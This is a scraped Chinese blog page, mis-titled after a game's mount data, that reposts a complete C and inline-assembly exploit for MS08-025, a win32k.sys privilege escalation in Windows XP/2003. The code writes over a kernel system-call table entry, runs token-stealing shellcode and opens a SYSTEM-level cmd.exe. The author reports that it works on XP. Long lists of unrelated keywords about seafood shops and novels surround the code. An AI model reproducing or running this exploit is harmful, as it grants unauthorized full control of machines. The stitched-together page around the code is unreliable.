程序博客网 > 主宰西游坐骑数据

MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit

来源:互联网 发布:主宰西游坐骑数据 编辑:程序博客网 时间:2024/06/03 17:49
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
另一种利用方式,通过覆盖SSDTNtVdmControl的地址进行shellcode的执行

#include <stdio.h>
#include <windows.h>

typedef LONG NTSTATUS;
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE               ProcessHandle,
                                       PVOID            *BaseAddress,
                                       ULONG                ZeroBits,
                                       PULONG           RegionSize,
                                       ULONG                AllocationType,
                                       ULONG                Protect );
typedef NTSTATUS (NTAPI *ZWVDMCONTROL)(ULONG, PVOID);
void ErrorQuit(char *msg)
{
    printf("%s:%x/n", msg, GetLastError());
    ExitProcess(0);
}
ZWVDMCONTROL    ZwVdmControl=NULL;
OSVERSIONINFOEX OsVersionInfo;

_declspec(naked) int ShellCode()
{

      if ( OsVersionInfo.dwMinorVersion == 1 ) {

       __asm {

               nop
               nop
               nop
               nop
               nop
               nop

               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
               Mov eax,[eax]

               mov esi,[eax+0x220]
               mov eax,esi

searchXp:

               mov eax,[eax+0x88]
               sub eax,0x88
               mov edx,[eax+0x84]
               cmp edx,0x4 // Find System Process
               jne searchXp

               mov eax,[eax+0xc8] // 获取system进程的token
               mov [esi+0xc8],eax // 修改当前进程的token

               ret 8

       }
   }
   if ( OsVersionInfo.dwMinorVersion == 2 ) {

       __asm {

           nop
               nop
               nop
               nop
               nop
               nop

               mov eax,0xFFDFF124 // eax = KPCR (not 3G Mode)
               Mov eax,[eax]

               mov esi,[eax+0x220]
               mov eax,esi

search2003:

               mov eax,[eax+0x98]
               sub eax,0x98
               mov edx,[eax+0x94]
                cmp edx,0x4 // Find System Process
               jne search2003

               mov eax,[eax+0xd8] // 获取system进程的token
               mov [esi+0xd8],eax // 修改当前进程的token
               ret 8

       }
   }


}

void InitTrampoline()
{

   PNTALLOCATE NtAllocateVirtualMemory;
   LPVOID       addr = (LPVOID)3;
   DWORD       dwShellSize=0x1000;
   unsigned char trampoline[]="/x68/x00/x00/x00/x00" //push 0x0
                               "/xc3";               // retn

   NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle("ntdll.dll"),"NtAllocateVirtualMemory");

   if( !NtAllocateVirtualMemory )
       exit(0);

   NtAllocateVirtualMemory(   (HANDLE)-1,
                               &addr,
                               0,
                               &dwShellSize,
                               MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                               PAGE_EXECUTE_READWRITE );

   if( (PULONG)addr )
   {
       printf("/n[++] Error Allocating memory/n");
       exit(0);
   }


   *(PULONG*)(trampoline+1)=(PULONG)ShellCode;
   memcpy(NULL,trampoline,sizeof(trampoline)-1);
}
int Callback_Overview()
{
   printf("/n");
   printf("=====================================================================   /n");
   printf("/t/tMicrosoft Windows XP SP2 - MS08-025 -       /n");
   printf("/twin32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit   /n");
   printf("=====================================================================   /n");
   printf("+ References:/n");
   printf(" http://www.microsoft.com/technet/security/bulletin/ms08-025.mspx/n");
   printf(" http://hi.baidu.com/vessial/n/n");
   return 1;
}

void GetFunction()
{
    HANDLE    hNtdll,hNtos;
   
    hNtdll = LoadLibrary("ntdll.dll");
    if(hNtdll == NULL)
        ErrorQuit("LoadLibrary failed./n");
       
    ZwVdmControl = (ZWVDMCONTROL)GetProcAddress(hNtdll, "ZwVdmControl");
    if(ZwVdmControl == NULL)
        ErrorQuit("GetProcAddress failed./n");
              
    FreeLibrary(hNtdll);
}
int main(int argc, char **argv)
{

   //PULONG   PntVdmControl=0x805F0DB0;
    char*   PntVdmControl=0x80502460; //通过*(PULONG)(KeServiceDescriptorTalbe)+0x10c*4获得
   
    
   STARTUPINFOA                stStartup;
   PROCESS_INFORMATION            pi;


   Callback_Overview();
   GetFunction();
   RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
   OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
   GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);

   if ( OsVersionInfo.dwMajorVersion != 5 ) {

       printf( "Not NT5 system/n" );
       ExitProcess( 0 );
   }
   //Get Operatiny System Version
       
   InitTrampoline();

   SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl );
   SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, (char*)PntVdmControl+2);
   printf("/n[+] Executing Shellcode.../n");

   ZwVdmControl(0, NULL);
   GetStartupInfo( &stStartup );

   CreateProcess( NULL,
       "cmd.exe",
       NULL,
       NULL,
       TRUE,
       NULL,
       NULL,
       NULL,
       &stStartup,
       &pi );   //此时创建的cmd.exeSYSTEM权限

  
   printf("[+] Exiting.../n");

   return TRUE;
}
我在XP测试成功,下面的第一个cmdSYSTEM权限,这是我们提权后的,一个cmdtest权限



 
主宰西游坐骑数据 主宰西游坐骑数据
原创粉丝点击
热门IT博客
网络文献参考文献格式网络文献参考文献格式
软件授权使用协议书软件授权使用协议书
淘宝去哪个平台刷单好
mac如何缩小照片kb
vb picturebox 保存为
python 爬虫 抓取文字
js正则表达式判断密码
sql中%
ios看电视直播软件
mysql emoji utf8mb4
ubuntu path 环境变量
cda数据分析师报名条件
可乐vicky软件 写真
js随机生成名字
comicstudio素材包 mac
淘宝上下架时间的技巧
mac byhost文件夹
新闻网站数据采集系统
java高并发
广电不许反清复明 知乎
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 海鲈鱼适合红烧还是清蒸 清蒸海鲈鱼的做法 海鲈鱼价格一斤多少钱 野生海鲈鱼多少钱一斤 海鲈鱼的做法大全家常 海鲈鱼怎么做 海鲈鱼的营养价值 海鲈鱼有刺吗 海鲈鱼钓法 海鲈鱼蒸多长时间 茄汁海鲈鱼 海鲜大礼包礼券 北京唐宫海鲜舫 金海明珠海鲜坊 阿新海鲜加工坊 上海唐宫海鲜坊 珍宝海鲜坊 民族饭店唐宫海鲜坊 海鲜宴席图片 海鲜宴图片 海鲜宴 海鲜公司 自助海鲜烧烤 海鲜自助烧烤 海鲜店名字 开家海鲜店 有趣的海鲜店名字 海鲜店名字大全集 开了个海鲜店赔了八万 开海鲜店利润大吗 特色海鲜店 海鲜店怎么开 海鲜店简介 海鲜店介绍 海鲜店店名 海鲜店图片 海鲜干货店 海鲜餐饮店 海鲜池制冷机 海鲜展示柜图片 海鲜冷藏柜

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里